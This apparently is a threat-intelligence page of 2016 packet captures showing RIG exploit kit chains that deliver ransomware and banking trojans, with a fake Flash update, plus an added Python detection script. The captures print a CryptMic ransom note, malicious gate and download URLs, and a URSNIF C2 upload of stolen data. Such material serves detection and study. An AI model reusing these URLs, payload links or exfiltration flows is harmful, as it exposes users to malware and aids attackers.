
RIG Web-based Exploit Kit EK Exploits Flash and loads Ransomware Variant CryptMic Malware PCAP file download 91.121.74.154

2016-09-26 00:40:25.886473 IP 192.168.1.18.51426 > 5.196.126.167.80: Flags [P.], seq 1:512, ack 1, win 16475, length 511: HTTP: GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
E..’.R@………..~….P..W..2.VP.@[….GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: chink12alzona.cyclemanagementassociates.info

2016-09-26 00:40:26.295112 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], ack 512, win 237, length 0
E..(..@.:…..~……P…2.V..Y.P….H..
2016-09-26 00:40:27.640845 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], seq 1:1319, ack 512, win 237, length 1318: HTTP: HTTP/1.1 200 OK
E..N..@.:…..~……P…2.V..Y.P…….HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2016 00:40:57 GMT
Content-Type: application/x-msdownload
Content-Length: 95232
Connection: keep-alive
Accept-Ranges: bytes

2016-09-26 00:40:31.356592 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [.], seq 9:1327, ack 19, win 257, length 1318
E..NX.@.z.8
[yJ………’ejB…aP…….NOT YOUR LANGUAGE? USE https://translate.google.com

What happened to your files ?
All of your files were protected by a strong encryption with RSA4096
More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

How did this happen ?
!!! Specially for your PC was generated personal RSA4096 Key , both public and private.
!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server

What do I do ?
So , there are two ways you can choose: wait for a _miracle_ and get _your_ PRICE DOUBLED! Or start obtaining *BITCOIN NOW! , and restore _YOUR_ _DATA_ easy way
If You have really valuable _DATA_, you better _NOT_ _WASTE_ _YOUR_ _TIME_, because there is _NO_ other way to get your files, except make a _PAYMENT_

Your personal ID: 2312323345345IDB23423423423445634dfg34ID

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:

1 – http://ccjlwb22w6c22p2k.onion.to
2 – http://ccjlwb22w6c22p2k.onion.city

If for some reasons the addresses are not availablweropie
2016-09-26 00:40:31.356709 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [P.], seq 1327:1668, ack 19, win 257, length 341
E..}X.@.z.;.[yJ………’eoh…aP…_5.., follow these steps:

1 – Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2 – Video instruction: https://www.youtube.com/watch?v=NQrUZdsw2hA
3 – After a successful installation, run the browser
4 – Type in the address bar: http://ccjlwb22w6c22p2k.onion
5 – Follow the instructions on the site
GootKit Banking Trojan Malware Delivered by RIG Exploit Kit EK PCAP file download traffic sample

2016-09-21 10:01:56.988869 IP 192.168.1.7.49212 > 31.184.193.179.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: GET / HTTP/1.1
E..A._@…N……….<.P…’.iR.P.@…..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.hairaddict.fr/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: myorderdesk.top
Connection: Keep-Alive

2016-09-21 10:01:57.203904 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], ack 282, win 123, length 0
E..(“.@.8.y……….P.<.iR….@P..{L…
2016-09-21 10:01:57.204021 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], seq 1:1351, ack 282, win 123, length 1350: HTTP: HTTP/1.1 200 OK
E..n”.@.8.tK………P.<.iR….@P..{….HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 14:02:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4439
Connection: close
Content-Type: application/x-shockwave-flash

CWS     ….x..X.t.Wy.;..}IZ..lKv…cg.Z….Md=-[.-…@3wfvf……>p..&MCC.&!..K.B mHiB.@.=….9=X.=..-$”..!P(m..V..!i…………

2016-09-21 10:02:01.948239 IP 192.168.1.7.49215 > 185.117.73.233.80: Flags [P.], seq 1118:1555, ack 27790, win 16269, length 437: HTTP: GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
E…..@…*……uI..?.P…..3..P.?…..GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: v4yw02i.c0ekkjjz.top
Connection: Keep-Alive

2016-09-21 10:02:02.152809 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], ack 1555, win 515, length 0
E..(..@.5….uI……P.?.3……P….J..
2016-09-21 10:02:04.257191 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], seq 27790:29140, ack 1555, win 515, length 1350: HTTP: HTTP/1.1 200 OK
E..n..@.5….uI……P.?.3……P…m…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 21 Sep 2016 14:04:12 GMT
Content-Type: application/x-msdownload
Content-Length: 212992
Connection: keep-alive
Accept-Ranges: bytes
2016-09-21 10:02:09.452597 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [S.], seq 1684872271, ack 3876680400, win 29200, options [mss 1350,nop,wscale 7,nop,nop,sackOK], length 0
E..4..@.-.S.xr.1…..P.Ddm.O..r…r.o……F……..
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@………xr.1.D.P..r.dm.PP.@………..
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E…..@………xr.1.D.P..r.dm.PP.@..E……v…r..W….j……$…..\…Z…(.?I.a…./.5…
…..   .
.2.8…….1…………..neonbdfindcraft.win.
…………..
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-…xr.1…..P.Ddm.P..sKP… …
2016-09-21 10:02:10.167352 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [P.], seq 1:1299, ack 124, win 229, length 1298: HTTP
E..:..@.-…xr.1…..P.Ddm.P..sKP….{……Y…U..W…..i.q.*.3..J{Y…..n…`…V x.J….x..x).3:&G9……u…V..j………………….V…R..O..L0..H0..0.  …_z…@0..    *.H……..0f1.0        ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0…160825192527Z..260823192527Z0f1.0  ..U….GB1.0…U….Yorks1.0…U….York1.0…U.
..MyCompany Ltd.1.0     ..U….IT1.0…U…     localhost0..”0..        *.H………….0..
……<.._Qm..!….%Q.K..!..o.[4…..a)S….|…X…Y:%………..c…\.l..Z’…….5……..E.
………@.v.eux……..}3&>….M.(…….^c..s..x.a…….UVH…x.
…&..f<…..:…….F…,.#…..L……>8.mi..!….2….s..cF`..H….D…^e\…?L..1…’…..s…….0..       *.H………….4…….0…..-6.,…nY.?1…Jy…….)…sURl..9V(h…A..V….)%……{>…*9….).l…r…H……..g.Nf…).4…V..)….6~….(.TT.Acy.>2.v…..[.I.Mk..%-…………….*.K]p..w. @….#……+..\u……………V..Kx-….s..w…..m..fT…7……$/.v..8t….K…G…A………..Q6…e._…W……v……(.}.l.*S..F5.. Z:.c….W.;……..S..B.!2.}..*..Q.d………..c.m=. .>…Y2..!l.35d.#..mK..R5b……..0,_8..$+…0…G.<^..f…..VWN…%..’..!.-*……<{.ZP!.I..:?c. ..&,.\……s..}nM.6<…=.#….Y…;..!…r.B0x…2..H.&..!.
~.O*..!U6.k…H…..    !!..5m=~5..”.+.e…..>…o.T.`\….2…………

RIG Exploit Kit EK Delivers Ransomware Variant CryptFile2 Malware C2 PCAP file download

2016-09-19 09:49:33.246002 IP 192.168.4.57.49469 > 192.185.52.124.80: Flags [P.], seq 1:303, ack 1, win 16537, length 302: HTTP: GET / HTTP/1.1
E..V4 @….k…9..4|.=.P’…….P.@..F..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: photos2tile.com
Connection: Keep-Alive
Cookie: PHPSESSID=11621c75d998a91f4a371effa2d932a8


2016-09-19 09:49:40.123529 IP 192.168.4.57.49490 > 31.184.193.187.80: Flags [.], ack 1, win 16537, length 0
E..(D.@……..9…..R.P.U/~.I..P.@………..
2016-09-19 09:49:40.123610 IP 192.168.4.57.49491 > 31.184.193.187.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: GET / HTTP/1.1
E..AD.@……..9…..S.P…….ZP.@.p<..GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://photos2tile.com/
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.autogrs.party
Connection: Keep-Alive

2016-09-19 09:49:43.630996 IP 192.168.4.57.49493 > 109.234.36.38.80: Flags [P.], seq 1155:1604, ack 27918, win 16265, length 449: HTTP: GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
E…NF@…S….9m.$&.U.Pt…….P.?.A…GET /index.php?x3qJc7ifLh_LDYo=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cbBF7NujF6ny-AXJJlzxxSFumRQz75LUF4S4gsQmqzMBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PZ2mJIu3lM&dfgsdf=29 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: add.arielcatering.com
Connection: Keep-Alive

2016-09-19 09:49:43.816016 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], ack 1604, win 258, length 0
E..(S.@.8…m.$&…9.P.U….t…P…V…
2016-09-19 09:49:44.884404 IP 109.234.36.38.80 > 192.168.4.57.49493: Flags [.], seq 27918:29268, ack 1604, win 258, length 1350: HTTP: HTTP/1.1 200 OK
E..nS.@.8…m.$&…9.P.U….t…P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Sep 2016 13:49:46 GMT
Content-Type: application/x-msdownload
Content-Length: 98304
Connection: keep-alive
Accept-Ranges: bytes

2016-09-19 09:49:50.836417 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 1:154, ack 1, win 16537, length 153: HTTP: GET /headers.jpg HTTP/1.1
E…O.@……..9…n.V.P….(_..P.@…..GET /headers.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 176.31.127.110
Cache-Control: no-cache

2016-09-19 09:49:51.102944 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [.], ack 154, win 237, length 0
E..(..@.3.R;…n…9.P.V(_……P…A…
2016-09-19 09:49:51.370886 IP 176.31.127.110.80 > 192.168.4.57.49494: Flags [P.], seq 1:234, ack 154, win 237, length 233: HTTP: HTTP/1.1 200 OK
E…..@.3.QQ…n…9.P.V(_……P…….HTTP/1.1 200 OK
Date: Mon, 19 Sep 2016 13:50:08 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Thu, 19 May 2016 09:26:49 GMT
ETag: "7-5332e92dca840"
Accept-Ranges: bytes
Content-Length: 7
Content-Type: image/jpeg

default
2016-09-19 09:49:51.371212 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [.], ack 234, win 16479, length 0
E..(O.@……..9…n.V.P….(_.{P.@_.0……..
2016-09-19 09:49:54.845384 IP 192.168.4.57.49494 > 176.31.127.110.80: Flags [P.], seq 154:331, ack 234, win 16479, length 177: HTTP: POST /zig/offers.php HTTP/1.1
E…O.@……..9…n.V.P….(_.{P.@_….POST /zig/offers.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: post_example
Host: 176.31.127.110
Content-Length: 1395
Cache-Control: no-cache
Packet Analysis Rig Exploit Kit EK Delivers URSNIF Banking Trojan Malware PCAP file download sample

2016-09-02 10:26:46.478966 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [P.], seq 1:391, ack 1, win 16537, length 390: HTTP: GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
E…..@…[……….F.Pbe.c….P.@..P..GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.gaapasa.com.au/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: sivupig.top
Connection: Keep-Alive

2016-09-02 10:26:46.774522 IP 192.168.4.200.49222 > 194.165.16.204.80: Flags [F.], seq 391, ack 5942, win 16402, length 0
E..(..@…\……….F.Pbe…..(P.@./&……..
2016-09-02 10:26:47.007595 IP 192.168.4.200.49221 > 194.165.16.204.80: Flags [P.], seq 1:403, ack 1, win 16537, length 402: HTTP: GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
E….!@…[;………E.P$W…YA*P.@…..GET /qrvfiif2krei9e-ld2ket4rtnfme2f8cknbnm4ntfmmpeoifs-omb-tacbmri7mnksmpkr7si4ioblpaes9ss1din5pme6r6clcm9leeno4pnmf/njr.gif HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gaapasa.com.au/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sivupig.top
Connection: Keep-Alive
2016-09-02 10:32:18.729778 IP 192.168.4.200.49233 > 185.39.72.169.80: Flags [P.], seq 1:941, ack 1, win 16537, length 940: HTTP: POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJY4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/znRft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
E…..@…’E…..’H..Q.P..;.p…P.@.j&..POST /images/NQ7qefK05DcL/8AQgPQWEUfX/UuqN22NQXUazEl/uuGGDuVwKlZDxDrjGR1I_/2F_2F4ZP67GoFJY4/fjOinZW31vb07eN/rQDpu_2BdxoNTMnJ9o/znRft0UM0/0wGtacJzyDCAKHMyYCnm/RYBzb_2BAKLxzUP3nPm/kQ3rVLpqeH3b1nyPWqpQN6/cA.bmp HTTP/1.1
Content-Type: multipart/form-data; boundary=————————–8d26b8d26b8d26b
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: diokamkahmi.at
Content-Length: 465
Connection: Keep-Alive
Cache-Control: no-cache

—————————-8d26b8d26b8d26b
Content-Disposition: form-data; name="upload_file"; filename="CA1E.bin"
Content-Type: application/octet-stream

MSCF…………,……………….O…….T………”I.D .01D205160934258A0B.=Z….T.CK..M..@…..w…D…p.Mt…CHd .Q/..q.,\h
&m……..1″$…’……….2`……………D.T…….E.l…0….\….l.Z….t…’…….. .[…….L……j..Ku.W….AS…s_..
—————————-8d26b8d26b8d26b–

2016-09-02 10:32:19.386415 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [.], ack 941, win 64595, length 0
E..(E}@.2.<..’H……P.Qp…..?.P..S….
2016-09-02 10:32:19.386531 IP 185.39.72.169.80 > 192.168.4.200.49233: Flags [P.], seq 1:135, ack 941, win 64595, length 134: HTTP: HTTP/1.1 200 OK
E…E.@.2.;f.’H……P.Qp…..?.P..S@…HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 12:32:03 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
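
The RIG samples above share a handful of stable markers: the SWF is fetched by the Flash plugin itself (an x-flash-version header plus a Referer pointing at the compromised site), the gate URL has the shape /index.php?<15-character key>=<long base64url blob>, sometimes with a trailing &dfgsdf=<n>, the payload comes back as application/x-msdownload, the URSNIF C2 uploads a CAB archive (starting with "MSCF") inside a multipart POST, and the CryptMIC note carries fixed strings such as "RSA4096" and "Your personal ID". The Python below is an added example, not code from the original page, that turns those markers into a triage pass over request/response pairs. The sample flows are constructed from the captures on this page (the gate blob is copied from the GootKit request, the other bodies are trimmed); the tag names, the 100-character blob threshold and the two-marker rule for a ransom note are this example's own choices.

```python
import re
from typing import Dict, List, Optional, Tuple

# Gate URL shape seen in the captures: a 15-character key, a long base64url
# value, optionally one extra numeric parameter. Key and blob change per
# victim; the shape does not. Threshold of 100 chars is this example's choice.
RIG_GATE_RE = re.compile(
    r"^/index\.php\?[A-Za-z0-9_]{15}=[A-Za-z0-9_-]{100,}(?:&[A-Za-z]+=\d+)?$"
)
EXE_MIME = "application/x-msdownload"
SWF_MIME = "application/x-shockwave-flash"
RANSOM_MARKERS = ("RSA4096", "Your personal ID", ".onion", "decrypt program")


def parse_http(raw: str) -> Dict:
    """Split one HTTP request or response into start line, lower-cased headers, body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"start": lines[0].strip(), "headers": headers, "body": body}


def looks_like_ransom_note(text: str) -> bool:
    """Two independent CryptMIC note strings in one payload is the bar used here."""
    return sum(marker in text for marker in RANSOM_MARKERS) >= 2


def classify(request: Dict, response: Optional[Dict] = None) -> List[str]:
    """Tag one request/response pair with the RIG chain stages it resembles."""
    tags: List[str] = []
    parts = request["start"].split()
    method, path = parts[0], parts[1]
    req_h = request["headers"]
    if RIG_GATE_RE.match(path):
        tags.append("rig-gate-url")
    # The exploit SWF is requested by the Flash plugin, not the page: it sends
    # x-flash-version and a Referer naming the compromised site.
    if "x-flash-version" in req_h and "referer" in req_h:
        tags.append("flash-plugin-fetch")
    if method == "POST" and "MSCF" in request["body"]:
        tags.append("cab-upload")  # URSNIF-style exfil of a CAB archive
    if response is not None:
        ctype = response["headers"].get("content-type", "")
        if ctype.startswith(SWF_MIME):
            tags.append("swf-served")
        if ctype.startswith(EXE_MIME):
            tags.append("exe-served")
        if looks_like_ransom_note(response["body"]):
            tags.append("ransom-note")
    return tags


def triage(flows: List[Tuple[str, Optional[str]]]) -> List[Dict]:
    """Run classify() over (request, response) text pairs and keep only the hits."""
    hits = []
    for req_raw, resp_raw in flows:
        req = parse_http(req_raw)
        resp = parse_http(resp_raw) if resp_raw else None
        tags = classify(req, resp)
        if tags:
            hits.append({"host": req["headers"].get("host", "?"),
                         "path": req["start"].split()[1], "tags": tags})
    return hits


# Constructed from the captures above; bodies trimmed to what the checks need.
GATE_URL = ("/index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298")
SAMPLE_FLOWS: List[Tuple[str, Optional[str]]] = [
    # 1. compromised site -> SWF fetched by the Flash plugin (GootKit sample)
    ("GET / HTTP/1.1\nAccept: */*\nReferer: http://www.hairaddict.fr/\n"
     "x-flash-version: 19,0,0,245\nHost: myorderdesk.top\nConnection: Keep-Alive\n\n",
     "HTTP/1.1 200 OK\nServer: Apache/2.2.15 (CentOS)\nContent-Length: 4439\n"
     "Content-Type: application/x-shockwave-flash\n\nCWS\x0b..."),
    # 2. RIG gate URL -> EXE payload
    ("GET " + GATE_URL + " HTTP/1.1\nAccept: */*\nHost: v4yw02i.c0ekkjjz.top\n\n",
     "HTTP/1.1 200 OK\nServer: nginx/1.6.2\nContent-Type: application/x-msdownload\n"
     "Content-Length: 212992\n\nMZ..."),
    # 3. innocuous-looking check-in (CryptFile2 sample) - no tags expected
    ("GET /headers.jpg HTTP/1.1\nHost: 176.31.127.110\n\n",
     "HTTP/1.1 200 OK\nContent-Type: image/jpeg\nContent-Length: 7\n\ndefault"),
    # 4. URSNIF C2 upload of a CAB archive inside a multipart POST
    ("POST /images/cA.bmp HTTP/1.1\nHost: diokamkahmi.at\n"
     "Content-Type: multipart/form-data; boundary=X\n\n--X\n"
     'Content-Disposition: form-data; name="upload_file"; filename="CA1E.bin"\n\n'
     "MSCF\x00\x00...\n--X--\n",
     "HTTP/1.1 200 OK\nServer: nginx\nContent-Length: 0\n\n"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_FLOWS):
        print(hit["host"], hit["path"][:40], hit["tags"])
```

A real run would feed the pairs from a pcap reassembly (for example tshark's http.request/http.response follow output) rather than literals; the point of keeping classify() separate from the parsing is that the same tags can be emitted from a proxy log, where only the request line, headers and response Content-Type survive.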

Fake Adobe Flash Player Update Binary Loads Qadars & Tor Bot Malware PCAP file download Traffic Sample

2016-09-01 18:42:39.848166 IP 192.168.4.175.49440 > 82.194.88.80.80: Flags [P.], seq 1:250, ack 1, win 64800, length 249: HTTP: GET / HTTP/1.1
E..!/0@…Z=….R.XP. .Py……
P..  {..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: sinlabajos.com
Connection: Keep-Alive

2016-09-01 18:42:40.094526 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], ack 250, win 15544, length 0
E..(M.@.4…R.XP…..P. …
y…P.<…..
2016-09-01 18:42:42.211314 IP 82.194.88.80.80 > 192.168.4.175.49440: Flags [.], seq 1:1351, ack 250, win 15544, length 1350: HTTP: HTTP/1.1 200 OK
E..nM.@.4..eR.XP…..P. …
y…P.<.o…HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:47 GMT
Server: Apache
Set-Cookie: 97c4d18b9c1b1386940bcf59303c3d2c=f84c33ffa7536c4fe576320400047d19; path=/; HttpOnly
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 01 Sep 2016 20:42:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Powered-By: PleskLin
Content-Length: 7965
Connection: close
Content-Type: text/html; charset=utf-8

2016-09-01 18:42:45.303305 IP 192.168.4.175.49497 > 85.25.95.39.80: Flags [P.], seq 1:301, ack 1, win 16537, length 300: HTTP: GET /js/analytic.php?id=4 HTTP/1.1
E..T4.@…K1….U._’.Y.PJ..s…
P.@.._..GET /js/analytic.php?id=4 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://sinlabajos.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 4lmbkpqrklqv.net
Connection: Keep-Alive

2016-09-01 18:42:45.494614 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [.], ack 301, win 123, length 0
E..(..@.5…U._’…..P.Y…
J…P..{….
2016-09-01 18:42:48.726768 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1:1229, ack 301, win 123, length 1228: HTTP: HTTP/1.1 200 OK
E…..@.5…U._’…..P.Y…
J…P..{.x..HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

2016-09-01 18:42:51.521801 IP 85.25.95.39.80 > 192.168.4.175.49497: Flags [P.], seq 1234:1603, ack 620, win 131, length 369: HTTP: HTTP/1.1 200 OK
E…..@.5..3U._’…..P.Y….J…P….E..HTTP/1.1 200 OK
Date: Thu, 01 Sep 2016 20:42:56 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips
X-Powered-By: PHP/5.4.45
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

6c
window.open('http://adobe-secur-update.com/update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427', '_self');

2016-09-01 18:42:52.009085 IP 192.168.4.175.49510 > 69.64.36.212.80: Flags [P.], seq 1:311, ack 1, win 16537, length 310: HTTP: GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
E..^9.@….8….E@$..f.P(*
….#P.@.p…GET /update/gate.php?hash=096dc88a4cd59b79ba66d2f6e5cec427 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: adobe-secur-update.com
Connection: Keep-Alive

<script>
setTimeout("location.href = 'https://www.dropbox.com/s/rj644igtfr503cs/flashplayer22_me_install.exe?dl=1';", 1000);
$(function() {

2016-09-01 19:01:27.398866 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [P.], seq 1:168, ack 1, win 16537, length 167
E…5.@…f…………..]……P.@…………….W..-.~..     8.y…..J….?……..K..*.<./.=.5…
.’…..+.#.,.$. .
.@.2.j.8…….K…………..j8le7s5q745e.org……….
…………………………….
2016-09-01 19:01:27.666128 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 1:80, ack 168, win 68, length 79
E..w;>@.r.o*……………..]..P..D……..J…F..
1.)….+Hn..C.f..:..@..<….M.. pl~…..E.~…2…..g…..S..U…=.
2016-09-01 19:01:27.666269 IP 192.168.4.175.50071 > 176.189.232.3.443: Flags [.], ack 80, win 16517, length 0
E..(5.@…g…………..]…..3P.@.r………
2016-09-01 19:01:27.849509 IP 176.189.232.3.443 > 192.168.4.175.50071: Flags [P.], seq 80:1121, ack 168, win 68, length 1041
